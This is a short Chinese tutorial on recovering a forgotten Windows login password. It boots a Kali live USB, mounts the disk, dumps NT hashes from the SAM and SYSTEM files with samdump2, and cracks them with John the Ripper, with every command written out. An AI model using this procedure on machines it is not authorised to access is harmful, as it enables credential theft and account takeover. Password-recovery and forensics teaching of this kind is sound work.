破解分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。谢谢!!
效果展示:
使用kali Linux可以轻松破解Windows用户及密码
准备阶段:
(1)准备一个kali Linux的启动盘
(2)准备一个已经遗忘登录密码的电脑
1.开机按电脑快捷键进入到启动盘‘f2’(每个品牌的开机键都不一样大家可自行上网查看)
2.选择第一个live模式回车进入到kali系统
#kali Linux的启动界面还是非常炫酷
3.进入到命令行进行挂载
#提升权限切换至root管理员
sudo su - root
查看磁盘分区
lsblk
#找到C盘编号
挂载磁盘至/mnt目录
mount /dev/nvme0n1p2 /mnt
4.找到Windows存放用户密码的文件
cd /mnt/Windows/System32/config
ls SYSTEM SAM
5.使用自带命令samdump2 提取Windows用户的密码hash值
samdump2 SYSTEM SAM > /root/sam.hash
cat /root/sam.hash
#这个就是它的用户及密码只不过是以密文的方式进行显示
6.使用John命令破解密码哈希值
john sam.hash --format=NT
##密码破解成功
7.拔掉kali启动盘,使用刚破解出的密码开始初次登录测试
判断是否可以成功进入到系统